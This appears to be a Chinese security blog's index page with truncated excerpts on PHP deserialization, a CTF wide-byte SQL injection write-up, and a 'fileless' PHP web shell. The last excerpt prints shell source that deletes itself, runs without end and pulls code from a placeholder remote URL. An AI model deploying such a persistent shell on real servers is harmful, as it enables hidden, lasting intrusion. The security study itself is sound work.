kerling

热爱安全。php python 低级coder 。爱美食爱电影爱二次元。0.3阶狼人杀玩家

反序列化随笔

Php反序列化一些随笔

0x1 简要:php反序列漏洞主要由于 PHP对象注入衍生出来的。是通过反序列化阶段更改类中数值之后通过魔术方法调用eval file_put_content之类 函数产生的漏洞

先写一个简单的demo


上方编写了一个Testa 类 内置一个为 name的属性 还编写了个messageout 方法用于输出$name  接下来我们序列化一下 这个testa类 使用serialize 函数可以序列化 更改下代码


$usr = new Testa();

echo...

2016-10-15

某一道ctf题

一天一个朋友丢来了一道他写的ctf题目。要求是:一次请求就获得全部的表

打开以后是这样子的

http://www.xxx.xx/cert/index.php?id=admin

下面有提示有说明sql语句  可以判断是字符型于是访问

http://www.xxx.xx/cert/index.php?id=admin'



可以判断是使用了addslashes()函数进行了转义处理

进行转义处理只有两个可能一个是 使用二次注入(明显不是,因为二次注入需要一次进库一次出库)

和宽字节

那么这里优先宽字节了 关于宽字节的原理可以在...

2016-06-10

关于 php无文件shell自己的一些想法体会

0x01

先贴一下源码

<?php


unlink($_SERVER['SCRIPT_FILENAME']); //删除自身


ignore_user_abort(true);  //设置使得用户无法终止 也就是说 我们关闭浏览器也没办法终止代码执行


set_time_limit(0);//设置延时时间 也就是 无限


$remote_file = 'http://xxx/xxx.txt'; //定义一个远程的变量


while($code...

2016-06-10
2 / 2

© kerling | Powered by LOFTER